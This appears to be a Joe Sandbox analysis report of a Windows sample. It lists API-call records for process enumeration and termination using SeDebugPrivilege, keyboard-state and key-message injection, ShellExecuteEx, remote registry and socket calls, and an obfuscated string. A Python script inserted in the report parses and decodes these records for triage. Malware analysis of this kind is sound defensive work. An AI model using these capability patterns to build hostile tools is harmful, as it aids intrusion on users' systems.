                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,0052AEF1,00000B00,?,?), ref: 0052B290
                                                                                  • DuplicateHandle.KERNEL32(00000000,?,0052AEF1,00000B00,?,?), ref: 0052B293
                                                                                  • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0052AEF1,00000B00,?,?), ref: 0052B2A3
                                                                                  • GetCurrentProcess.KERNEL32(0052AEF1,00000000,?,0052AEF1,00000B00,?,?), ref: 0052B2AB
                                                                                  • DuplicateHandle.KERNEL32(00000000,?,0052AEF1,00000B00,?,?), ref: 0052B2AE
                                                                                  • CreateThread.KERNEL32(00000000,00000000,0052B2D4,00000000,00000000,00000000), ref: 0052B2C8
                                                                                  Similarity
                                                                                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                  • String ID:
                                                                                  • API String ID: 1957940570-0
                                                                                  • Opcode ID: b38a75a91d4b8e9806bdf19508952b1e99d85e296cd7507322d6e0517cd0c372
                                                                                  • Instruction ID: 8bb0eeeeb6c991980c8a7360a93a322ee1344dd5907aceb7a8b8546062f2308c
                                                                                  • Opcode Fuzzy Hash: b38a75a91d4b8e9806bdf19508952b1e99d85e296cd7507322d6e0517cd0c372
                                                                                  • Instruction Fuzzy Hash: B001E4B5240308BFE610AFA5EC49F6B3BBCEF98700F008411FA08CB1A1CA719844EB31
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: NULL Pointer assignment$Not an Object type
                                                                                  • API String ID: 0-572801152
                                                                                  • Opcode ID: 9beff7891908bb74c79f9fabf656be7b7c71afcbeb77e09c4aec8a04ce4516fb
                                                                                  • Instruction ID: 606991305a6a60fe11a1456cc33c9cee9c425973a3df0742a30cc3e1af141c04
                                                                                  • Opcode Fuzzy Hash: 9beff7891908bb74c79f9fabf656be7b7c71afcbeb77e09c4aec8a04ce4516fb
                                                                                  • Instruction Fuzzy Hash: 61E1C571A0121AABDF54DFA8D885AEE7FB5FF88318F148429F905A7281D770AD41CB90
                                                                                  APIs
                                                                                    • Part of subcall function 004F936C: __swprintf.LIBCMT ref: 004F93AB
                                                                                    • Part of subcall function 004F936C: __itow.LIBCMT ref: 004F93DF
                                                                                    • Part of subcall function 0050C6F4: _wcscpy.LIBCMT ref: 0050C717
                                                                                  • _wcstok.LIBCMT ref: 0054184E
                                                                                  • _wcscpy.LIBCMT ref: 005418DD
                                                                                  • _memset.LIBCMT ref: 00541910
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                  • String ID: X$p2Zl2Z
                                                                                  • API String ID: 774024439-2338586027
                                                                                  • Opcode ID: 54f71046e42e2de1bb2e7bf06705b5bf5208eebe89c386967f5d20be4d89964e
                                                                                  • Instruction ID: bcf234875e80411099fb9fd7a64bcc6a727805b68666156d5fa80cbd20709817
                                                                                  • Opcode Fuzzy Hash: 54f71046e42e2de1bb2e7bf06705b5bf5208eebe89c386967f5d20be4d89964e
                                                                                  • Instruction Fuzzy Hash: 50C1C3355047459FC714EF25C985AAEBBE0FF85358F00496EF989972A2DB30EC44CB8A
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00559B19
                                                                                  • SendMessageW.USER32(?,00001036,00000000,?), ref: 00559B2D
                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00559B47
                                                                                  • _wcscat.LIBCMT ref: 00559BA2
                                                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 00559BB9
                                                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00559BE7
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Window_wcscat
                                                                                  • String ID: SysListView32
                                                                                  • API String ID: 307300125-78025650
                                                                                  • Opcode ID: b76a1c7ae0179f38d8e4ba9e4fd336c6b23cc8331303361fda4bbc1afed5f42d
                                                                                  • Instruction ID: 1e0b5baee73d3021404d18e9d14f3ddbff505fea63437caf0ae440c3351c2aa0
                                                                                  • Opcode Fuzzy Hash: b76a1c7ae0179f38d8e4ba9e4fd336c6b23cc8331303361fda4bbc1afed5f42d
                                                                                  • Instruction Fuzzy Hash: 6041C571900308EFEB219FA4DC95BEE7BB8FF48351F10042AF949A7191C6759D88DB60
                                                                                  APIs
                                                                                    • Part of subcall function 00536532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00536554
                                                                                    • Part of subcall function 00536532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00536564
                                                                                    • Part of subcall function 00536532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 005365F9
                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0055179A
                                                                                  • GetLastError.KERNEL32 ref: 005517AD
                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 005517D9
                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00551855
                                                                                  • GetLastError.KERNEL32(00000000), ref: 00551860
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00551895
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                  • String ID: SeDebugPrivilege
                                                                                  • API String ID: 2533919879-2896544425
                                                                                  • Opcode ID: 307eb70118e6431193b18f89d25abd2f62798b546c916a642036363cc4c0416c
                                                                                  • Instruction ID: 5331734df18cdefa7718bc18793b28283f84b652b97d5f95043f6ce9db4ad841
                                                                                  • Opcode Fuzzy Hash: 307eb70118e6431193b18f89d25abd2f62798b546c916a642036363cc4c0416c
                                                                                  • Instruction Fuzzy Hash: 0741CC71600201AFDB15EF54C8A9F6DBFB1BF94301F04849AF9069F2C2DB74A948CB55
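The record above lists a routine that snapshots the process list (CreateToolhelp32Snapshot with TH32CS_SNAPPROCESS), opens a target with OpenProcess(00000001) and calls TerminateProcess on it, while referencing the string SeDebugPrivilege. The following is an added example, not Joe Sandbox tooling, that parses the report's own record lines (the "APIs" bullets and the "Memory Dump Source" line) into structured data and decodes the two fields a reviewer usually wants resolved: the OpenProcess desired-access mask and the page protection of the dumped region. The sample record is copied from the lines above. Assumptions: the first two fields of the .sdmp name are the process index and dump pass (they mirror the hcaresult_0_2_4f0000 snapshot name), the fifth field is a winnt.h page-protection value, and the fields after it are left undecoded.

```python
"""Triage helpers for Joe Sandbox function records (added example, not Joe
Sandbox code).  Parses '• Api.MODULE(args), ref: ADDR' bullets and the
'Source File: ....sdmp' line of one record, then decodes the OpenProcess
access mask and the dump region's page protection.
"""
import re
from dataclasses import dataclass, field

# Page-protection constants from winnt.h.  Assumption: the 5th dotted field of
# the .sdmp name carries this value (0x20 on the .text dump above).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
# Process access rights from winnt.h (first argument of OpenProcess).
PROCESS_ACCESS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE", 0x0400: "PROCESS_QUERY_INFORMATION",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION", 0x100000: "SYNCHRONIZE",
}

API_RE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<api>[\w#]+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)")
# Assumption: <process index>.<dump pass>.<timestamp>.<base>.<protection>. ...
SDMP_RE = re.compile(
    r"(?P<idx>[0-9A-F]{8})\.(?P<dpass>[0-9A-F]{8})\.\d+\."
    r"(?P<base>[0-9A-F]{16})\.(?P<prot>[0-9A-F]{8})\.")


@dataclass
class ApiCall:
    api: str
    module: str
    args: list = field(default_factory=list)
    ref: int = 0
    subcall: bool = False


def parse_api_line(line):
    """Parse one API bullet; returns None for any other kind of line."""
    m = API_RE.match(line)
    if not m:
        return None
    args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
    return ApiCall(m.group("api"), m.group("module"), args,
                   int(m.group("ref"), 16), m.group("sub") is not None)


def decode_flags(value, table):
    """Expand a bitmask into constant names; unknown bits are kept as hex."""
    names = [name for bit, name in table.items() if value & bit]
    rest = value & ~sum(table)
    return names + ([hex(rest)] if rest else [])


def parse_dump_source(line):
    """Decode the .sdmp name on a 'Source File:' line; None if absent."""
    m = SDMP_RE.search(line)
    if not m:
        return None
    return {"process": int(m.group("idx"), 16), "pass": int(m.group("dpass"), 16),
            "base": int(m.group("base"), 16),
            "protection": decode_flags(int(m.group("prot"), 16), PAGE_PROTECT)}


def triage(record_lines):
    """Return (calls, dump, findings) for the lines of one function record."""
    calls = [c for c in map(parse_api_line, record_lines) if c]
    dump = next((d for d in map(parse_dump_source, record_lines) if d), None)
    findings = []
    for c in calls:
        # Only decode a concrete mask; '?' means the analyzer could not recover it.
        if c.api == "OpenProcess" and c.args and c.args[0] != "?":
            rights = decode_flags(int(c.args[0], 16), PROCESS_ACCESS)
            findings.append(f"OpenProcess({'|'.join(rights)}) at {c.ref:08X}")
    if {"OpenProcess", "TerminateProcess"} <= {c.api for c in calls}:
        findings.append("opens and terminates another process")
    if any("SeDebugPrivilege" in line for line in record_lines):
        findings.append("references the SeDebugPrivilege string")
    return calls, dump, findings


# Constructed sample: lines copied from the record above, indentation dropped.
SAMPLE_RECORD = """\
• Part of subcall function 00536532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00536554
• Part of subcall function 00536532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00536564
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0055179A
• GetLastError.KERNEL32 ref: 005517AD
• TerminateProcess.KERNEL32(00000000,00000000), ref: 00551855
• CloseHandle.KERNEL32(00000000), ref: 00551895
• Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
• String ID: SeDebugPrivilege
""".splitlines()

if __name__ == "__main__":
    calls, dump, findings = triage(SAMPLE_RECORD)
    print(f"{len(calls)} calls from region {dump['base']:#x} "
          f"({'|'.join(dump['protection'])})")
    for item in findings:
        print(" -", item)
```

Run on the sample it reports six calls from the executable region at 0x4f1000 and three findings: OpenProcess requested only PROCESS_TERMINATE, the routine both opens and terminates a foreign process, and it references SeDebugPrivilege, which is what a kill-by-PID helper needs to reach processes owned by other users.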
                                                                                  APIs
                                                                                  • LoadIconW.USER32(00000000,00007F03), ref: 005358B8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: IconLoad
                                                                                  • String ID: blank$info$question$stop$warning
                                                                                  • API String ID: 2457776203-404129466
                                                                                  • Opcode ID: 2154c857eac33668ab16bb0000096e57a8db253e1e5e67f73609ab529dd48836
                                                                                  • Instruction ID: 36249dd19e726c68e9bfae8abbdf06fdd7ab02dbd10e873c339de73803d6e95e
                                                                                  • Opcode Fuzzy Hash: 2154c857eac33668ab16bb0000096e57a8db253e1e5e67f73609ab529dd48836
                                                                                  • Instruction Fuzzy Hash: EA110D31609753FAE7055B549C83DAEAFECBF65314F30103AF501E62C1F7B0AA814264
                                                                                  APIs
                                                                                  • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0053A806
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ArraySafeVartype
                                                                                  • String ID:
                                                                                  • API String ID: 1725837607-0
                                                                                  • Opcode ID: 53864ced5aff03b368e47d988454a225bee373dc49badad8c14177bef4b37518
                                                                                  • Instruction ID: 76425fbae94a74c5deed4a63a91e4e3bc6acdfb8b383b175ef9220c73578c780
                                                                                  • Opcode Fuzzy Hash: 53864ced5aff03b368e47d988454a225bee373dc49badad8c14177bef4b37518
                                                                                  • Instruction Fuzzy Hash: 64C1AF72A0020ADFDB10CF98D485BAEBBF4FF08311F204469E685E7281D775AA45CF91
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00536B63
                                                                                  • LoadStringW.USER32(00000000), ref: 00536B6A
                                                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00536B80
                                                                                  • LoadStringW.USER32(00000000), ref: 00536B87
                                                                                  • _wprintf.LIBCMT ref: 00536BAD
                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00536BCB
                                                                                  Strings
                                                                                  • %s (%d) : ==> %s: %s %s, xrefs: 00536BA8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleLoadModuleString$Message_wprintf
                                                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                                                  • API String ID: 3648134473-3128320259
                                                                                  • Opcode ID: a22e63e3ac122b9b9def29a7e0bf948e1eb63e708b79aa7487a7cfdc2d188062
                                                                                  • Instruction ID: a544bf33928fc8623d58f84b80b9de588fba924b01182e792b3b7389be6d74cd
                                                                                  • Opcode Fuzzy Hash: a22e63e3ac122b9b9def29a7e0bf948e1eb63e708b79aa7487a7cfdc2d188062
                                                                                  • Instruction Fuzzy Hash: F70136F65002087FEB11AB94AD89EF7777CEB04304F404495B749E6041EA749EC8AF74
                                                                                  APIs
                                                                                    • Part of subcall function 00553C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00552BB5,?,?), ref: 00553C1D
                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00552BF6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuffCharConnectRegistryUpper
                                                                                  • String ID:
                                                                                  • API String ID: 2595220575-0
                                                                                  • Opcode ID: 5688e89b87e103dc6b2bacb1a8bacab55c69c12a8bcf1c00444e8be7fadc5e3e
                                                                                  • Instruction ID: 1e296c95e2f2e4b4992a8dd3b7805eb599034543506a19cc46376508b461c0d8
                                                                                  • Opcode Fuzzy Hash: 5688e89b87e103dc6b2bacb1a8bacab55c69c12a8bcf1c00444e8be7fadc5e3e
                                                                                  • Instruction Fuzzy Hash: E8918931204205AFCB00EF15C895B6EBBF5FF89315F04881EF996972A2DB34E949DB42
                                                                                  APIs
                                                                                  • select.WSOCK32 ref: 00549691
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 0054969E
                                                                                  • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 005496C8
                                                                                  • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 005496E9
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 005496F8
                                                                                  • htons.WSOCK32(?,?,?,00000000,?), ref: 005497AA
                                                                                  • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,0058DC00), ref: 00549765
                                                                                    • Part of subcall function 0052D2FF: _strlen.LIBCMT ref: 0052D309
                                                                                  • _strlen.LIBCMT ref: 00549800
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                                                  • String ID:
                                                                                  • API String ID: 3480843537-0
                                                                                  • Opcode ID: 5264eb550586fad9ccf9d35d7f26827884f9f78441f87a19ae19b4089e60c018
                                                                                  • Instruction ID: d6e66d844ba10d31bbdf1aa17479d70f457fba6354c646f2c88f30cd93b8fde0
                                                                                  • Opcode Fuzzy Hash: 5264eb550586fad9ccf9d35d7f26827884f9f78441f87a19ae19b4089e60c018
                                                                                  • Instruction Fuzzy Hash: F881CC31504204ABC714EF65DC86EABBBA8FFC5718F104A1EF5559B291EB30E904CBA6
                                                                                  APIs
                                                                                  • __mtinitlocknum.LIBCMT ref: 0051A991
                                                                                    • Part of subcall function 00517D7C: __FF_MSGBANNER.LIBCMT ref: 00517D91
                                                                                    • Part of subcall function 00517D7C: __NMSG_WRITE.LIBCMT ref: 00517D98
                                                                                    • Part of subcall function 00517D7C: __malloc_crt.LIBCMT ref: 00517DB8
                                                                                  • __lock.LIBCMT ref: 0051A9A4
                                                                                  • __lock.LIBCMT ref: 0051A9F0
                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,005A6DE0,00000018,00525E7B,?,00000000,00000109), ref: 0051AA0C
                                                                                  • EnterCriticalSection.KERNEL32(8000000C,005A6DE0,00000018,00525E7B,?,00000000,00000109), ref: 0051AA29
                                                                                  • LeaveCriticalSection.KERNEL32(8000000C), ref: 0051AA39
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                  • String ID:
                                                                                  • API String ID: 1422805418-0
                                                                                  • Opcode ID: cb5dad541bfd16a0065e85df2db6df5b8e649f6b6789af88861d3c74cb92bf6a
                                                                                  • Instruction ID: f8c18c95ad388cb179139a2d4b9d6fb7ae0b7d98a61c953bc4eb5e257f6fbfa9
                                                                                  • Opcode Fuzzy Hash: cb5dad541bfd16a0065e85df2db6df5b8e649f6b6789af88861d3c74cb92bf6a
                                                                                  • Instruction Fuzzy Hash: D6415671A022069BFB219F68DA447ECBFB0BF41334F148318E429AB2D1D77498C4CB92
                                                                                  APIs
                                                                                  • DeleteObject.GDI32(00000000), ref: 00558EE4
                                                                                  • GetDC.USER32(00000000), ref: 00558EEC
                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00558EF7
                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00558F03
                                                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00558F3F
                                                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00558F50
                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0055BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00558F8A
                                                                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00558FAA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3864802216-0
                                                                                  • Opcode ID: 480ba72c5916a3f68e6883d9d6ac5540553df2eb5f8887e502f2317da649fa1a
                                                                                  • Instruction ID: 7e0054aee645cfc7347c0418cd4157c4e8a2518b114785d2bd0a8e2e3374c471
                                                                                  • Opcode Fuzzy Hash: 480ba72c5916a3f68e6883d9d6ac5540553df2eb5f8887e502f2317da649fa1a
                                                                                  • Instruction Fuzzy Hash: 6B315C72200214BFEB108F50DC4AFEA3FB9FF59716F044065FE08AA191D6759845DB70
                                                                                  APIs
                                                                                    • Part of subcall function 0050B34E: GetWindowLongW.USER32(?,000000EB), ref: 0050B35F
                                                                                  • GetSystemMetrics.USER32(0000000F), ref: 0056016D
                                                                                  • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0056038D
                                                                                  • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 005603AB
                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?), ref: 005603D6
                                                                                  • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 005603FF
                                                                                  • ShowWindow.USER32(00000003,00000000), ref: 00560421
                                                                                  • DefDlgProcW.USER32(?,00000005,?,?), ref: 00560440
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                                                  • String ID:
                                                                                  • API String ID: 3356174886-0
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 0055225A
                                                                                  • _memset.LIBCMT ref: 00552323
                                                                                  • ShellExecuteExW.SHELL32(?), ref: 00552368
                                                                                    • Part of subcall function 004F936C: __swprintf.LIBCMT ref: 004F93AB
                                                                                    • Part of subcall function 004F936C: __itow.LIBCMT ref: 004F93DF
                                                                                    • Part of subcall function 0050C6F4: _wcscpy.LIBCMT ref: 0050C717
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0055242F
                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 0055243E
                                                                                  Similarity
                                                                                  • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                  • String ID: @
                                                                                  • API String ID: 4082843840-2766056989
                                                                                  APIs
                                                                                  • GetParent.USER32(?), ref: 00533DE7
                                                                                  • GetKeyboardState.USER32(?), ref: 00533DFC
                                                                                  • SetKeyboardState.USER32(?), ref: 00533E5D
                                                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 00533E8B
                                                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 00533EAA
                                                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 00533EF0
                                                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00533F13
                                                                                  Similarity
                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                  • String ID:
                                                                                  • API String ID: 87235514-0
                                                                                  APIs
                                                                                  • GetParent.USER32(00000000), ref: 00533C02
                                                                                  • GetKeyboardState.USER32(?), ref: 00533C17
                                                                                  • SetKeyboardState.USER32(?), ref: 00533C78
                                                                                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00533CA4
                                                                                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00533CC1
                                                                                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00533D05
                                                                                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00533D26
                                                                                  Similarity
                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                  • String ID:
                                                                                  • API String ID: 87235514-0
                                                                                  Similarity
                                                                                  • API ID: _wcsncpy$LocalTime
                                                                                  • String ID:
                                                                                  • API String ID: 2945705084-0
                                                                                  Strings
                                                                                  • vv9aqg50vv9aqg50vv9aqg50vv9aqg50vv9aqg56vv9aqg56vv9aqg58vv9aqg59vv9aqg54vv9aqg55vv9aqg5evv9aqg50vv9aqg5bvv9aqg59vv9aqg56vv9aqg55vv, xrefs: 0055CD76
                                                                                  Similarity
                                                                                  • API ID:
